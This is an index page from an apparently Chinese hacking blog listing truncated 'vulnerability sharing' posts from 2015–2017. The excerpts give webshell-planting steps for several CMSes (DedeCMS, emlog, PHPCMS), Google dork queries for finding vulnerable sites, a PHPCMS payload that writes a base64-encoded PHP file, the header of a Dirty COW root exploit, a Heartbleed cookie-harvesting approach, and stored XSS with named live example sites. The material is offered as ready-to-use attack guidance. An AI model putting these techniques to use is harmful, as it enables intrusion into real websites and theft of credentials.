漏洞分享 织梦apache写马install 热门文章

时间:2017-2-11   作者:ㄕ℡尐憶ㄟ   浏览:1018   评论:0
(好像看到什么不该看的了)-----------------------------------------------------------------------------------------------------------条件WEB容器为apachehttps://www.exploit-db.com/e...

漏洞分享 emlog个人博客系统后台存在权限提升漏洞 热门文章

时间:2017-2-5   作者:ㄕ℡尐憶ㄟ   浏览:1353   评论:0
点击播放单曲:我知道你不爱我-格子兮、威仔影响版本emlog<=5.1.2前提条件:需要登录后台漏洞利用登录后台之后访问admin/?action=phpinfo页面,获取网站物理路径在数据库备份页面先备份数据库,导出到本地电脑。然后编辑导出的.sql格式的数据库备份文件。在最后一行添加如下代码。将修改后的sql文件...

漏洞分享 dedeCMS友情链接getshell漏洞利用 热门文章

时间:2017-2-4   作者:ㄕ℡尐憶ㄟ   浏览:1407   评论:0
dedeCMS友情链接getshell漏洞利用把qing.php上传到你的空间域名站长审核后台友情连接后会自动生成一句话使用菜刀连接即可

漏洞分享 Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞 热门文章

时间:2016-10-29   作者:ㄕ℡尐憶ㄟ   浏览:1101   图片:3  评论:0
0x00漏洞概述1.漏洞简介Joomla是一个自由开源的内容管理系统,近日研究者发现在其3.4.4到3.6.3的版本中存在两个漏洞:CVE-2016-8869,CVE-2016-8870。我们在这里仅分析CVE-2016-8870,利用该漏洞,攻击者可以在网站关闭注册的情况下注册用户。Joomla官方已对此漏洞发布升级公告...

漏洞分享 脏牛漏洞 Dirty COW CVE-2016-5195 2.6.22 < 3.9 (x86/x64) 热门文章

时间:2016-10-25   作者:ㄕ℡尐憶ㄟ   浏览:1134   评论:0
/**(un)commentcorrectpayloadfirst(x86orx64)!**$gcccowroot.c-ocowroot-pthread*$./cowroot*DirtyCowrootprivilegeescalation*Backingup/usr/bin/passwd..to/tmp/bak*Sizeo...

漏洞分享 雷迅通用漏洞 批量拿shell 热门文章

时间:2015-8-28   作者:ㄕ℡尐憶ㄟ   浏览:3816   图片:1  评论:0
雷迅该程序采用枫叶通用防注入1.0asp版,此防注入完全鸡肋,该网站程序pro_show.asp有cookies注入或者变型注入百度搜索inurl:pro_show.asp?showid=判断字节数,再联合搜索下,基本上都可以爆出用户名和密码<一般是在"2"和"11">后台上传地址:admin/inc/upfi...

漏洞分享 网站通CMS 0day,全版本GetShell 热门文章

时间:2015-8-16   作者:ㄕ℡尐憶ㄟ   浏览:3832   图片:4  评论:0
GoogleHack:inurl:second.aspx?nodeid=filetype:aspx查了下还有比较多的后台管理URL:/console/login.aspx无意发现个网站,存在FCK编辑器,于是乎经行了简单的黑盒测试,首先看看FCK编辑器版本(fck_about.html)2.4.1存在漏洞,下一步就是找寻上...

漏洞分享 PHPCMS后台低权限拿webSHELL 热门文章

时间:2015-7-26   作者:ㄕ℡尐憶ㄟ   浏览:1788   评论:0
PHPCMS程序版本:PhpcmsV9.5.6Release20140522提权教程全过程1.添加专题专题名称:test专题横幅:/1.jpg专题缩略图:/1.jpg专题导读:<?phpfile_put_contents('hackxiaoyi.php',base64_decode('PD9w...

漏洞分享 心脏滴血另类玩法 热门文章

时间:2015-7-9   作者:ㄕ℡尐憶ㄟ   浏览:1395   评论:0
心脏滴血另类玩法在遇到存在某些心脏滴血的时候是否会直接提交了事?说不定你会错漏一些重要信息。下面要说的是就是可以写一个脚本循环监控存在心脏滴血的站点,存在cookie或者某些帐号密码的时候会保存下来。OpenSSLHeartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把。单纯从攻击的角度讲,我已知道的...

漏洞分享 海盗CMS建网系统0day(存储型XSS) 热门文章

时间:2015-7-8   作者:admin   浏览:1846   图片:5  评论:0
海盗CMS两处XSS漏洞(均可打管理)官方网站http://www.haidao.la案例网站:http://www.malchinail.comhttp://tuhaow.com/http://tianjinshengyuan.com/http://www.wangetongkuai.comhttp://www.beiz...

漏洞分享 fckeditor asp漏洞利用 热门文章

时间:2015-7-7   作者:ㄕ℡尐憶ㄟ   浏览:2125   评论:0
出现上传漏洞的地址是:http://hackxiaoyi.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类...

漏洞分享 fckeditor php 漏洞利用 热门文章

时间:2015-7-6   作者:ㄕ℡尐憶ㄟ   浏览:1281   评论:0
fckeditorphp漏洞利用http://hackxiaoyi.com/includes/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://http://hackxiaoyi.com%2Ff...
加载耗时:0.029秒查询数据库:16次消耗内存:1.95MB 闽ICP备15003974号-1
©2014-2017 hackxiaoyi 尐憶一Blog All right reserved. 版权所有
回到顶部 去留言 回到底部
扫一扫微信二维码
微信号:mingjian9941
00:00 / 00:00
顺序播放
    sitemap 网站地图